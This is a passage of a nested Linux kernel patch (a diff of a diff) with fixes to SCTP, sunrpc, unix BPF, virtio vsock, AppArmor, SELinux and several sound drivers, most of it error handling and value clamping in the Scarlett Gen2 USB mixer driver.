+ 	pr_debug("%s: sk:%p, msghdr:%p, len:%zd, flags:0x%x, addr_len:%p)\n",
+ 		 __func__, sk, msg, len, flags, addr_len);
+ 
++	if (unlikely(flags & MSG_ERRQUEUE))
++		return inet_recv_error(sk, msg, len, addr_len);
++
++	if (sk_can_busy_loop(sk) &&
++	    skb_queue_empty_lockless(&sk->sk_receive_queue))
++		sk_busy_loop(sk, flags & MSG_DONTWAIT);
++
+ 	lock_sock(sk);
+ 
+ 	if (sctp_style(sk, TCP) && !sctp_sstate(sk, ESTABLISHED) &&
+@@ -9038,12 +9045,6 @@ struct sk_buff *sctp_skb_recv_datagram(struct sock *sk, int flags, int *err)
+ 		if (sk->sk_shutdown & RCV_SHUTDOWN)
+ 			break;
+ 
+-		if (sk_can_busy_loop(sk)) {
+-			sk_busy_loop(sk, flags & MSG_DONTWAIT);
+-
+-			if (!skb_queue_empty_lockless(&sk->sk_receive_queue))
+-				continue;
+-		}
+ 
+ 		/* User doesn't want to wait.  */
+ 		error = -EAGAIN;
+diff --git a/net/sunrpc/xprtmultipath.c b/net/sunrpc/xprtmultipath.c
+index 701250b305dba..74ee2271251e3 100644
+--- a/net/sunrpc/xprtmultipath.c
++++ b/net/sunrpc/xprtmultipath.c
+@@ -284,7 +284,7 @@ struct rpc_xprt *_xprt_switch_find_current_entry(struct list_head *head,
+ 		if (cur == pos)
+ 			found = true;
+ 		if (found && ((find_active && xprt_is_active(pos)) ||
+-			      (!find_active && xprt_is_active(pos))))
++			      (!find_active && !xprt_is_active(pos))))
+ 			return pos;
+ 	}
+ 	return NULL;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index 7ea7c3a0d0d06..bd84785bf8d6c 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -161,15 +161,30 @@ int unix_stream_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool r
+ {
+ 	struct sock *sk_pair;
+ 
++	/* Restore does not decrement the sk_pair reference yet because we must
++	 * keep the a reference to the socket until after an RCU grace period
++	 * and any pending sends have completed.
++	 */
+ 	if (restore) {
+ 		sk->sk_write_space = psock->saved_write_space;
+ 		sock_replace_proto(sk, psock->sk_proto);
+ 		return 0;
+ 	}
+ 
+-	sk_pair = unix_peer(sk);
+-	sock_hold(sk_pair);
+-	psock->sk_pair = sk_pair;
++	/* psock_update_sk_prot can be called multiple times if psock is
++	 * added to multiple maps and/or slots in the same map. There is
++	 * also an edge case where replacing a psock with itself can trigger
++	 * an extra psock_update_sk_prot during the insert process. So it
++	 * must be safe to do multiple calls. Here we need to ensure we don't
++	 * increment the refcnt through sock_hold many times. There will only
++	 * be a single matching destroy operation.
++	 */
++	if (!psock->sk_pair) {
++		sk_pair = unix_peer(sk);
++		sock_hold(sk_pair);
++		psock->sk_pair = sk_pair;
++	}
++
+ 	unix_stream_bpf_check_needs_rebuild(psock->sk_proto);
+ 	sock_replace_proto(sk, &unix_stream_bpf_prot);
+ 	return 0;
+diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
+index 2e25890ca52d1..9983b833b55d8 100644
+--- a/net/vmw_vsock/virtio_transport_common.c
++++ b/net/vmw_vsock/virtio_transport_common.c
+@@ -366,6 +366,8 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 	struct virtio_vsock_sock *vvs = vsk->trans;
+ 	size_t bytes, total = 0;
+ 	struct sk_buff *skb;
++	u32 fwd_cnt_delta;
++	bool low_rx_bytes;
+ 	int err = -EFAULT;
+ 	u32 free_space;
+ 
+@@ -400,7 +402,10 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 		}
+ 	}
+ 
+-	free_space = vvs->buf_alloc - (vvs->fwd_cnt - vvs->last_fwd_cnt);
++	fwd_cnt_delta = vvs->fwd_cnt - vvs->last_fwd_cnt;
++	free_space = vvs->buf_alloc - fwd_cnt_delta;
++	low_rx_bytes = (vvs->rx_bytes <
++			sock_rcvlowat(sk_vsock(vsk), 0, INT_MAX));
+ 
+ 	spin_unlock_bh(&vvs->rx_lock);
+ 
+@@ -410,9 +415,11 @@ virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
+ 	 * too high causes extra messages. Too low causes transmitter
+ 	 * stalls. As stalls are in theory more expensive than extra
+ 	 * messages, we set the limit to a high value. TODO: experiment
+-	 * with different values.
++	 * with different values. Also send credit update message when
++	 * number of bytes in rx queue is not enough to wake up reader.
+ 	 */
+-	if (free_space < VIRTIO_VSOCK_MAX_PKT_BUF_SIZE)
++	if (fwd_cnt_delta &&
++	    (free_space < VIRTIO_VSOCK_MAX_PKT_BUF_SIZE || low_rx_bytes))
+ 		virtio_transport_send_credit_update(vsk);
+ 
+ 	return total;
+diff --git a/scripts/Makefile.compiler b/scripts/Makefile.compiler
+index 158c57f2acfde..87589a7ba27f3 100644
+--- a/scripts/Makefile.compiler
++++ b/scripts/Makefile.compiler
+@@ -72,7 +72,3 @@ clang-min-version = $(shell [ $(CONFIG_CLANG_VERSION)0 -ge $(1)0 ] && echo y)
+ # ld-option
+ # Usage: KBUILD_LDFLAGS += $(call ld-option, -X, -Y)
+ ld-option = $(call try-run, $(LD) $(KBUILD_LDFLAGS) $(1) -v,$(1),$(2),$(3))
+-
+-# ld-ifversion
+-# Usage:  $(call ld-ifversion, -ge, 22252, y)
+-ld-ifversion = $(shell [ $(CONFIG_LD_VERSION)0 $(1) $(2)0 ] && echo $(3) || echo $(4))
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 7012fd82f1bb1..633e778ec3692 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -674,6 +674,10 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 
+ 	tmpname = aa_splitn_fqname(name, strlen(name), &tmpns, &ns_len);
+ 	if (tmpns) {
++		if (!tmpname) {
++			info = "empty profile name";
++			goto fail;
++		}
+ 		*ns_name = kstrndup(tmpns, ns_len, GFP_KERNEL);
+ 		if (!*ns_name) {
+ 			info = "out of memory";
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index d88c399b0e86b..d45e9fa74e62d 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -4690,6 +4690,13 @@ static int selinux_socket_bind(struct socket *sock, struct sockaddr *address, in
+ 				return -EINVAL;
+ 			addr4 = (struct sockaddr_in *)address;
+ 			if (family_sa == AF_UNSPEC) {
++				if (family == PF_INET6) {
++					/* Length check from inet6_bind_sk() */
++					if (addrlen < SIN6_LEN_RFC2133)
++						return -EINVAL;
++					/* Family check from __inet6_bind() */
++					goto err_af;
++				}
+ 				/* see __inet_bind(), we only want to allow
+ 				 * AF_UNSPEC if the address is INADDR_ANY
+ 				 */
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 5efb3adee48d9..62f2137044923 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9626,6 +9626,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x87f5, "HP", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87f6, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
+ 	SND_PCI_QUIRK(0x103c, 0x87f7, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
++	SND_PCI_QUIRK(0x103c, 0x87fe, "HP Laptop 15s-fq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8805, "HP ProBook 650 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x880d, "HP EliteBook 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8811, "HP Spectre x360 15-eb1xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+@@ -9720,6 +9721,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c97, "HP ZBook", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -9978,6 +9980,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3176, "ThinkCentre Station", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3178, "ThinkCentre Station", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x31af, "ThinkCentre Station", ALC623_FIXUP_LENOVO_THINKSTATION_P340),
++	SND_PCI_QUIRK(0x17aa, 0x334b, "Lenovo ThinkCentre M70 Gen5", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3801, "Lenovo Yoga9 14IAP7", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3802, "Lenovo Yoga DuetITL 2021", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3813, "Legion 7i 15IMHG05", ALC287_FIXUP_LEGION_15IMHG05_SPEAKERS),
+diff --git a/sound/pci/oxygen/oxygen_mixer.c b/sound/pci/oxygen/oxygen_mixer.c
+index 46705ec77b481..eb3aca16359c5 100644
+--- a/sound/pci/oxygen/oxygen_mixer.c
++++ b/sound/pci/oxygen/oxygen_mixer.c
+@@ -718,7 +718,7 @@ static int ac97_fp_rec_volume_put(struct snd_kcontrol *ctl,
+ 	oldreg = oxygen_read_ac97(chip, 1, AC97_REC_GAIN);
+ 	newreg = oldreg & ~0x0707;
+ 	newreg = newreg | (value->value.integer.value[0] & 7);
+-	newreg = newreg | ((value->value.integer.value[0] & 7) << 8);
++	newreg = newreg | ((value->value.integer.value[1] & 7) << 8);
+ 	change = newreg != oldreg;
+ 	if (change)
+ 		oxygen_write_ac97(chip, 1, AC97_REC_GAIN, newreg);
+diff --git a/sound/soc/codecs/cs35l33.c b/sound/soc/codecs/cs35l33.c
+index 15e79168d256e..c3b7046fd29ba 100644
+--- a/sound/soc/codecs/cs35l33.c
++++ b/sound/soc/codecs/cs35l33.c
+@@ -22,13 +22,11 @@
+ #include <sound/soc-dapm.h>
+ #include <sound/initval.h>
+ #include <sound/tlv.h>
+-#include <linux/gpio.h>
+ #include <linux/gpio/consumer.h>
+ #include <sound/cs35l33.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/regulator/machine.h>
+-#include <linux/of_gpio.h>
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/of_irq.h>
+@@ -1167,7 +1165,7 @@ static int cs35l33_i2c_probe(struct i2c_client *i2c_client)
+ 
+ 	/* We could issue !RST or skip it based on AMP topology */
+ 	cs35l33->reset_gpio = devm_gpiod_get_optional(&i2c_client->dev,
+-			"reset-gpios", GPIOD_OUT_HIGH);
++			"reset", GPIOD_OUT_HIGH);
+ 	if (IS_ERR(cs35l33->reset_gpio)) {
+ 		dev_err(&i2c_client->dev, "%s ERROR: Can't get reset GPIO\n",
+ 			__func__);
+diff --git a/sound/soc/codecs/cs35l34.c b/sound/soc/codecs/cs35l34.c
+index b3f98023e6a75..57d125c03fad0 100644
+--- a/sound/soc/codecs/cs35l34.c
++++ b/sound/soc/codecs/cs35l34.c
+@@ -20,14 +20,12 @@
+ #include <linux/regulator/machine.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/of_device.h>
+-#include <linux/of_gpio.h>
+ #include <linux/of_irq.h>
+ #include <sound/core.h>
+ #include <sound/pcm.h>
+ #include <sound/pcm_params.h>
+ #include <sound/soc.h>
+ #include <sound/soc-dapm.h>
+-#include <linux/gpio.h>
+ #include <linux/gpio/consumer.h>
+ #include <sound/initval.h>
+ #include <sound/tlv.h>
+@@ -1061,7 +1059,7 @@ static int cs35l34_i2c_probe(struct i2c_client *i2c_client)
+ 		dev_err(&i2c_client->dev, "Failed to request IRQ: %d\n", ret);
+ 
+ 	cs35l34->reset_gpio = devm_gpiod_get_optional(&i2c_client->dev,
+-				"reset-gpios", GPIOD_OUT_LOW);
++				"reset", GPIOD_OUT_LOW);
+ 	if (IS_ERR(cs35l34->reset_gpio)) {
+ 		ret = PTR_ERR(cs35l34->reset_gpio);
+ 		goto err_regulator;
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index 60518ee5a86e7..fd3dca08460ba 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3827,14 +3827,6 @@ static const struct dmi_system_id dmi_platform_data[] = {
+ 		},
+ 		.driver_data = (void *)&ecs_ef20_platform_data,
+ 	},
+-	{
+-		.ident = "EF20EA",
+-		.callback = cht_rt5645_ef20_quirk_cb,
+-		.matches = {
+-			DMI_MATCH(DMI_PRODUCT_NAME, "EF20EA"),
+-		},
+-		.driver_data = (void *)&ecs_ef20_platform_data,
+-	},
+ 	{ }
+ };
+ 
+diff --git a/sound/soc/intel/common/soc-acpi-intel-glk-match.c b/sound/soc/intel/common/soc-acpi-intel-glk-match.c
+index 387e731008841..8911c90bbaf68 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-glk-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-glk-match.c
+@@ -19,6 +19,11 @@ static const struct snd_soc_acpi_codecs glk_codecs = {
+ 	.codecs = {"MX98357A"}
+ };
+ 
++static const struct snd_soc_acpi_codecs glk_rt5682_rt5682s_hp = {
++	.num_codecs = 2,
++	.codecs = {"10EC5682", "RTL5682"},
++};
++
+ struct snd_soc_acpi_mach snd_soc_acpi_intel_glk_machines[] = {
+ 	{
+ 		.id = "INT343A",
+@@ -35,20 +40,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_glk_machines[] = {
+ 		.sof_tplg_filename = "sof-glk-da7219.tplg",
+ 	},
+ 	{
+-		.id = "10EC5682",
++		.comp_ids = &glk_rt5682_rt5682s_hp,
+ 		.drv_name = "glk_rt5682_mx98357a",
+ 		.fw_filename = "intel/dsp_fw_glk.bin",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &glk_codecs,
+ 		.sof_tplg_filename = "sof-glk-rt5682.tplg",
+ 	},
+-	{
+-		.id = "RTL5682",
+-		.drv_name = "glk_rt5682_max98357a",
+-		.machine_quirk = snd_soc_acpi_codec_list,
+-		.quirk_data = &glk_codecs,
+-		.sof_tplg_filename = "sof-glk-rt5682.tplg",
+-	},
+ 	{
+ 		.id = "10134242",
+ 		.drv_name = "glk_cs4242_mx98357a",
+diff --git a/sound/soc/mediatek/common/mtk-dsp-sof-common.c b/sound/soc/mediatek/common/mtk-dsp-sof-common.c
+index 8b1b623207bee..d4d1d3b9572a7 100644
+--- a/sound/soc/mediatek/common/mtk-dsp-sof-common.c
++++ b/sound/soc/mediatek/common/mtk-dsp-sof-common.c
+@@ -24,7 +24,7 @@ int mtk_sof_dai_link_fixup(struct snd_soc_pcm_runtime *rtd,
+ 		struct snd_soc_dai_link *sof_dai_link = NULL;
+ 		const struct sof_conn_stream *conn = &sof_priv->conn_streams[i];
+ 
+-		if (strcmp(rtd->dai_link->name, conn->normal_link))
++		if (conn->normal_link && strcmp(rtd->dai_link->name, conn->normal_link))
+ 			continue;
+ 
+ 		for_each_card_rtds(card, runtime) {
+diff --git a/sound/usb/mixer_scarlett_gen2.c b/sound/usb/mixer_scarlett_gen2.c
+index 9d11bb08667e7..1bcb05c73e0ad 100644
+--- a/sound/usb/mixer_scarlett_gen2.c
++++ b/sound/usb/mixer_scarlett_gen2.c
+@@ -1337,9 +1337,11 @@ static void scarlett2_config_save(struct usb_mixer_interface *mixer)
+ {
+ 	__le32 req = cpu_to_le32(SCARLETT2_USB_CONFIG_SAVE);
+ 
+-	scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
+-		      &req, sizeof(u32),
+-		      NULL, 0);
++	int err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
++				&req, sizeof(u32),
++				NULL, 0);
++	if (err < 0)
++		usb_audio_err(mixer->chip, "config save failed: %d\n", err);
+ }
+ 
+ /* Delayed work to save config */
+@@ -1388,7 +1390,10 @@ static int scarlett2_usb_set_config(
+ 		size = 1;
+ 		offset = config_item->offset;
+ 
+-		scarlett2_usb_get(mixer, offset, &tmp, 1);
++		err = scarlett2_usb_get(mixer, offset, &tmp, 1);
++		if (err < 0)
++			return err;
++
+ 		if (value)
+ 			tmp |= (1 << index);
+ 		else
+@@ -1793,14 +1798,20 @@ static int scarlett2_sync_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->sync_updated)
+-		scarlett2_update_sync(mixer);
++
++	if (private->sync_updated) {
++		err = scarlett2_update_sync(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->sync;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static const struct snd_kcontrol_new scarlett2_sync_ctl = {
+@@ -1883,22 +1894,35 @@ static int scarlett2_master_volume_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->master_vol;
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int line_out_remap(struct scarlett2_data *private, int index)
+ {
+ 	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int line_out_count =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+ 
+ 	if (!info->line_out_remap_enable)
+ 		return index;
++
++	if (index >= line_out_count)
++		return index;
++
+ 	return info->line_out_remap[index];
+ }
+ 
+@@ -1909,14 +1933,20 @@ static int scarlett2_volume_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+ 	int index = line_out_remap(private, elem->control);
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->vol[index];
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_volume_ctl_put(struct snd_kcontrol *kctl,
+@@ -1983,14 +2013,20 @@ static int scarlett2_mute_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+ 	int index = line_out_remap(private, elem->control);
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->mute_switch[index];
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_mute_ctl_put(struct snd_kcontrol *kctl,
+@@ -2236,14 +2272,20 @@ static int scarlett2_level_enum_ctl_get(struct snd_kcontrol *kctl,
+ 	const struct scarlett2_device_info *info = private->info;
+ 
+ 	int index = elem->control + info->level_input_first;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->level_switch[index];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_level_enum_ctl_put(struct snd_kcontrol *kctl,
+@@ -2294,15 +2336,21 @@ static int scarlett2_pad_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] =
+ 		private->pad_switch[elem->control];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_pad_ctl_put(struct snd_kcontrol *kctl,
+@@ -2352,14 +2400,20 @@ static int scarlett2_air_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->air_switch[elem->control];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_air_ctl_put(struct snd_kcontrol *kctl,
+@@ -2409,15 +2463,21 @@ static int scarlett2_phantom_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->input_other_updated)
+-		scarlett2_update_input_other(mixer);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] =
+ 		private->phantom_switch[elem->control];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_phantom_ctl_put(struct snd_kcontrol *kctl,
+@@ -2589,14 +2649,20 @@ static int scarlett2_direct_monitor_ctl_get(
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = elem->head.mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->monitor_other_updated)
+-		scarlett2_update_monitor_other(mixer);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->direct_monitor_switch;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_direct_monitor_ctl_put(
+@@ -2696,14 +2762,20 @@ static int scarlett2_speaker_switch_enum_ctl_get(
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->monitor_other_updated)
+-		scarlett2_update_monitor_other(mixer);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->speaker_switching_switch;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ /* when speaker switching gets enabled, switch the main/alt speakers
+@@ -2851,14 +2923,20 @@ static int scarlett2_talkback_enum_ctl_get(
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->monitor_other_updated)
+-		scarlett2_update_monitor_other(mixer);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->talkback_switch;
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_talkback_enum_ctl_put(
+@@ -3006,14 +3084,20 @@ static int scarlett2_dim_mute_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->vol_updated)
+-		scarlett2_update_volumes(mixer);
+-	mutex_unlock(&private->data_mutex);
+ 
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.integer.value[0] = private->dim_mute[elem->control];
+-	return 0;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_dim_mute_ctl_put(struct snd_kcontrol *kctl,
+@@ -3277,7 +3361,8 @@ static int scarlett2_mixer_ctl_put(struct snd_kcontrol *kctl,
+ 	mutex_lock(&private->data_mutex);
+ 
+ 	oval = private->mix[index];
+-	val = ucontrol->value.integer.value[0];
++	val = clamp(ucontrol->value.integer.value[0],
++		    0L, (long)SCARLETT2_MIXER_MAX_VALUE);
+ 	num_mixer_in = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+ 	mix_num = index / num_mixer_in;
+ 
+@@ -3383,22 +3468,21 @@ static int scarlett2_mux_src_enum_ctl_get(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int line_out_count =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int index = elem->control;
+-
+-	if (index < line_out_count)
+-		index = line_out_remap(private, index);
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
+ 
+ 	mutex_lock(&private->data_mutex);
+-	if (private->mux_updated)
+-		scarlett2_usb_get_mux(mixer);
++
++	if (private->mux_updated) {
++		err = scarlett2_usb_get_mux(mixer);
++		if (err < 0)
++			goto unlock;
++	}
+ 	ucontrol->value.enumerated.item[0] = private->mux[index];
+-	mutex_unlock(&private->data_mutex);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
+ }
+ 
+ static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
+@@ -3407,16 +3491,9 @@ static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
+ 	struct usb_mixer_elem_info *elem = kctl->private_data;
+ 	struct usb_mixer_interface *mixer = elem->head.mixer;
+ 	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
